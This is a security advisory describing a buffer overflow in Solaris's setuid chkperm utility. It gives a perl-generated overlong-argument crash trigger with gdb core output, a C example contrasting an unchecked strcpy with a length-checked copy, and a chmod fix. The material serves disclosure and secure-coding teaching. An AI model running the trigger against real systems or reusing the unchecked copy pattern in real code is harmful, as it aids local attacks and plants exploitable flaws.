COMMAND

    /usr/vmsys/bin/chkperm

SYSTEMS AFFECTED

    Solaris 2.x

PROBLEM

    Yong jun Kim found the following.  We all know that
    /usr/vmsys/bin/chkperm contains a mountain of known bugs.  Here's
    one more that Yong found: a buffer overflow vulnerability.

    The problem occurs when chkperm processes its argument.  It accepts
    the argument without checking its length, and this causes the
    overflow.  It seems that this vulnerability also applies to
    Solaris 7, the latest version.

        [Hackerslab:/users/loveyou/buf]$ chkperm -n `perl -e 'print "x" x 200'`
        Segmentation fault (core dumped)
        [hackerslab:/users/loveyou/buf]$ gdb chkperm core
        GDB is free software and you are welcome to distribute copies of it
         under certain conditions; type "show copying" to see the conditions.
        There is absolutely no warranty for GDB; type "show warranty" for details.
        GDB 4.16 (sparc-sun-solaris2.5.1),
        Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
        Core was generated by `./chkperm -n xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        xxxxxxxxxxxxxxxxxxxxxx'.
        Program terminated with signal 11, Segmentation fault.
        Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
        Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
        Reading symbols from /usr/platform/SUNW,Ultra-Enterprise/lib/libc_psr.so.1...
        (no debugging symbols found)...done.
        #0  0xef73ea68 in nvmatch ()
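
    The class of bug described above, an argument copied without a
    length check, shown beside a length-checked form.  This is an added
    example, not chkperm's source (which is not shown here); the buffer
    size, function names and "-n name" handling are assumptions.

```c
/* Added illustration: hypothetical option handling, not chkperm's source. */
#include <stdio.h>
#include <string.h>

#define NAME_BUF 64   /* assumed buffer size, chosen for this example */

/* Unchecked pattern: copies however many bytes the caller supplies. */
void copy_name_unchecked(char *dst, const char *arg)
{
    strcpy(dst, arg);   /* overruns dst when strlen(arg) >= buffer size */
}

/* Checked pattern: returns 0 on success, -1 if arg is missing or too long. */
int copy_name_checked(char *dst, size_t dstsz, const char *arg)
{
    size_t n;

    if (dst == NULL || dstsz == 0 || arg == NULL)
        return -1;
    n = strlen(arg);
    if (n >= dstsz)     /* must leave room for the terminating NUL */
        return -1;
    memcpy(dst, arg, n + 1);
    return 0;
}

int main(int argc, char **argv)
{
    char name[NAME_BUF];

    if (argc != 3 || strcmp(argv[1], "-n") != 0) {
        fprintf(stderr, "usage: %s -n name\n", argv[0]);
        return 2;
    }
    /* Reject over-long input instead of copying it into the buffer. */
    if (copy_name_checked(name, sizeof name, argv[2]) != 0) {
        fprintf(stderr, "%s: name too long (max %d)\n", argv[0], NAME_BUF - 1);
        return 1;
    }
    printf("name accepted: %s\n", name);
    return 0;
}
```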

SOLUTION

    It is recommended that the suid bit be removed from chkperm using
    the command below (mode 400 also removes execute permission):

        chmod 400 /usr/vmsys/bin/chkperm

    It is _NOT_ exploitable under i386.